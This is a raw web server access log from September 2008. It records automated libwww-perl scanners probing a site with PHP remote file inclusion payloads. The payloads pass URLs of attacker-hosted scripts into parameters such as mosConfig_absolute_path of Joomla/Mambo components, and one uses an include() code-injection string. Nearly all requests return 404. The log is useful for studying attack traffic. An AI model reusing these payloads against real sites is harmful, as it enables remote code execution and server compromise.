66.147.239.184 - - [10/Sep/2008:00:46:45 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.itel.cl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
210.109.102.117 - - [10/Sep/2008:00:46:54 -0400] "GET /logs/error_log.Q108081800/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
210.109.102.117 - - [10/Sep/2008:00:47:14 -0400] "GET /logs/error_log.Q108082400/class/forumpollrenderer.php?bbPath[path]=http://sagehippo.com.au/jobs/idv6.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:00:48:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.87.154.41 - - [10/Sep/2008:00:48:53 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:48:56 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:48:56 -0400] "GET /convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:49:01 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
209.90.77.32 - - [10/Sep/2008:00:49:08 -0400] "GET /logs/error_log.Q108082000//oneadmin/config.php?path[docroot]=http://www.trosken.com/test.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
205.234.195.214 - - [10/Sep/2008:00:50:13 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
205.234.195.214 - - [10/Sep/2008:00:50:13 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
205.234.195.214 - - [10/Sep/2008:00:50:13 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
205.234.195.214 - - [10/Sep/2008:00:50:16 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:20 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:20 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:20 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:25 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
83.168.205.116 - - [10/Sep/2008:00:50:28 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:50:28 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:50:28 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
64.246.56.49 - - [10/Sep/2008:00:50:29 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:29 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:50:29 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
216.55.159.47 - - [10/Sep/2008:00:50:29 -0400] "GET /logs/access_log.Q108082600/?view=page&pagename=http://host92.hostmonster.com/~weblands/wsu3/hotornot/ids.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
216.55.159.47 - - [10/Sep/2008:00:50:30 -0400] "GET /?view=page&pagename=http://host92.hostmonster.com/~weblands/wsu3/hotornot/ids.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
69.5.29.71 - - [10/Sep/2008:00:50:30 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:50:30 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:50:30 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
216.55.159.47 - - [10/Sep/2008:00:50:30 -0400] "GET /logs/?view=page&pagename=http://host92.hostmonster.com/~weblands/wsu3/hotornot/ids.txt?? HTTP/1.1" 200 65068 "-" "libwww-perl/5.803"
205.234.195.214 - - [10/Sep/2008:00:50:32 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
205.234.195.214 - - [10/Sep/2008:00:50:32 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
205.234.195.214 - - [10/Sep/2008:00:50:32 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
69.5.29.71 - - [10/Sep/2008:00:50:33 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:50:40 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:50:40 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:50:41 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
83.168.205.116 - - [10/Sep/2008:00:50:43 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
64.246.56.49 - - [10/Sep/2008:00:50:49 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
69.5.29.71 - - [10/Sep/2008:00:50:55 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
205.234.195.214 - - [10/Sep/2008:00:50:57 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
216.55.159.47 - - [10/Sep/2008:00:51:42 -0400] "GET /logs/access_log.Q108081000/?view=page&pagename=http://host92.hostmonster.com/~weblands/wsu3/hotornot/ids.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
66.147.239.184 - - [10/Sep/2008:00:52:39 -0400] "GET /logs/error_log.Q108081500//components/com_simpleboard/image_upload.php?sbp=http://www.itel.cl/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:52:40 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:52:40 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:52:41 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:52:46 -0400] "GET /logs/access_log.Q108060200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
62.81.206.30 - - [10/Sep/2008:00:53:06 -0400] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
62.81.206.30 - - [10/Sep/2008:00:53:06 -0400] "GET /logs/error_log.Q108022800//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
62.81.206.30 - - [10/Sep/2008:00:53:07 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
209.59.12.99 - - [10/Sep/2008:00:53:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.81.206.30 - - [10/Sep/2008:00:53:54 -0400] "GET /logs/error_log.Q108081700//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
89.253.240.227 - - [10/Sep/2008:00:54:13 -0400] "GET /default.php?page=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:55:07 -0400] "GET /logs/error_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:55:08 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.5.29.71 - - [10/Sep/2008:00:55:08 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
64.246.56.49 - - [10/Sep/2008:00:55:11 -0400] "GET /logs/error_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:55:12 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
64.246.56.49 - - [10/Sep/2008:00:55:12 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.5.29.71 - - [10/Sep/2008:00:55:12 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
64.246.56.49 - - [10/Sep/2008:00:55:21 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
62.87.154.41 - - [10/Sep/2008:00:55:22 -0400] "GET /logs/error_log.Q108030100/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:55:23 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:55:23 -0400] "GET /convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
62.87.154.41 - - [10/Sep/2008:00:55:23 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
69.41.187.99 - - [10/Sep/2008:00:56:04 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
69.41.187.99 - - [10/Sep/2008:00:56:04 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
69.41.187.99 - - [10/Sep/2008:00:56:04 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
69.41.187.99 - - [10/Sep/2008:00:56:17 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
83.168.205.116 - - [10/Sep/2008:00:57:42 -0400] "GET /logs/error_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:57:43 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:57:43 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
83.168.205.116 - - [10/Sep/2008:00:57:59 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://indocairo.net/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
81.176.226.164 - - [10/Sep/2008:00:58:23 -0400] "GET /logs/access_log.Q108081200/?page=http://www.ba-sat.com/sunshop/images/products/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
81.176.226.164 - - [10/Sep/2008:00:58:23 -0400] "GET /?page=http://www.ba-sat.com/sunshop/images/products/id.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
81.176.226.164 - - [10/Sep/2008:00:58:23 -0400] "GET /logs/?page=http://www.ba-sat.com/sunshop/images/products/id.txt?%0D?? HTTP/1.1" 200 65068 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:00:58:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.186.255.184 - - [10/Sep/2008:00:59:20 -0400] "GET /logs/error_log.Q108052900//modules/agendax/addevent.inc.php?agendax_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
89.253.240.227 - - [10/Sep/2008:00:59:38 -0400] "GET /logs/access_log.Q108082400/default.php?page=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
89.253.240.227 - - [10/Sep/2008:00:59:38 -0400] "GET /logs/default.php?page=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
89.253.240.227 - - [10/Sep/2008:00:59:41 -0400] "GET /logs/error_log.Q108081300/default.php?page=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.191.167.34 - - [10/Sep/2008:05:11:37 -0400] "GET /logs/error_log.Q108061400//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.diandrahot.com.ar/classes/phpmailer//language/phpmailer?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:13:10 -0400] "GET /logs/access_log.Q108081400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
207.44.236.14 - - [10/Sep/2008:05:13:14 -0400] "GET /logs/access_log.Q108051500//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:13:14 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
151.64.162.47 - - [10/Sep/2008:05:13:22 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
207.44.236.14 - - [10/Sep/2008:05:13:26 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
151.64.162.47 - - [10/Sep/2008:05:13:27 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:13:40 -0400] "GET /logs/access_log.Q108081400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:13:40 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:13:40 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:14:08 -0400] "GET /logs/access_log.Q108081400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:14:09 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:14:10 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Sep/2008:05:14:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.222.27.201 - - [10/Sep/2008:05:14:16 -0400] "GET /logs/error_log.Q108082000/images/errors.php?error=http://www.diandrahot.com.ar/classes/phpmailer//language/phpmailer?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:32 -0400] "GET /usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:32 -0400] "GET /logs/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:32 -0400] "GET /logs/error_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:32 -0400] "GET /logs/access_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:41 -0400] "GET /logs/error_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:41 -0400] "GET /usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:41 -0400] "GET /logs/access_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:14:41 -0400] "GET /logs/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
212.69.226.12 - - [10/Sep/2008:05:14:59 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
212.69.226.12 - - [10/Sep/2008:05:14:59 -0400] "GET //admin/classes/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
212.69.226.12 - - [10/Sep/2008:05:14:59 -0400] "GET /logs//admin/classes/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
74.50.106.226 - - [10/Sep/2008:05:15:10 -0400] "GET /logs/access_log.Q108071700%20/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
74.50.106.226 - - [10/Sep/2008:05:15:14 -0400] "GET /logs/access_log.Q108071700%20/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
151.64.162.47 - - [10/Sep/2008:05:15:18 -0400] "GET /logs/access_log.Q108081400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:15:18 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:15:19 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
207.44.236.14 - - [10/Sep/2008:05:15:29 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.64.162.47 - - [10/Sep/2008:05:15:29 -0400] "GET /logs/access_log.Q108081400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:15:38 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
151.64.162.47 - - [10/Sep/2008:05:15:41 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/babik/bangsat/idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
64.255.237.141 - - [10/Sep/2008:05:16:14 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:16:15 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
